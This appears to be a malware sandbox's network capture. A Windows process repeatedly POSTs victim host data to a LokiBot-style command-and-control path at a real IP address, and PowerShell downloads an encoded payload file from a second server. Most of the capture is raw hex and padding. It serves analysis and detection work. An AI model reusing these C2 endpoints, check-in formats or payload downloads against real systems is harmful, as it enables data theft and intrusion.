                                                                                    Oct 24, 2024 08:46:03.924861908 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.924875975 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.924881935 CEST848INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.925067902 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.925122976 CEST212INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.925159931 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:03.930320978 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.224917894.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:07.495675087 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 176
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:07.501003027 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: 'ckav.ruAlbus040965ALBUS-PCk0DE4229FCF97F5879F50F8FD31bcqt
                                                                                    Oct 24, 2024 08:46:08.436815977 CEST228INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:08 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 15
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.224917994.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:08.597771883 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 176
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:08.603128910 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: 'ckav.ruAlbus040965ALBUS-PC+0DE4229FCF97F5879F50F8FD3tcetK
                                                                                    Oct 24, 2024 08:46:09.532896042 CEST228INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:09 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 15
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.224918094.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:09.648638010 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:09.653986931 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:10.615833044 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.224918194.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:10.788578987 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:10.793925047 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:11.760720015 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.224918294.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:11.956769943 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:11.962080002 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:12.938143969 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.224918394.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:13.258053064 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:13.263396025 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:14.212583065 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.224918494.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:14.524611950 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:14.530065060 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:15.608517885 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.224918594.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:15.792145967 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:15.797609091 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:17.050389051 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:16 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.224918694.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:17.249245882 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:17.256131887 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:18.216243029 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.2249187192.3.176.141803560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:17.647430897 CEST81OUTGET /36/LOGS%20LOKI.txt HTTP/1.1
                                                                                    Host: 192.3.176.141
                                                                                    Connection: Keep-Alive
                                                                                    Oct 24, 2024 08:46:18.328573942 CEST1236INHTTP/1.1 200 OK
                                                                                    Date: Thu, 24 Oct 2024 06:46:17 GMT
                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                    Last-Modified: Thu, 24 Oct 2024 00:22:01 GMT
                                                                                    ETag: "22aac-6252dfdc859ae"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 141996
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: text/plain
                                                                                    Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                    Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.328592062 CEST224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.328632116 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.328672886 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    Oct 24, 2024 08:46:18.328727961 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
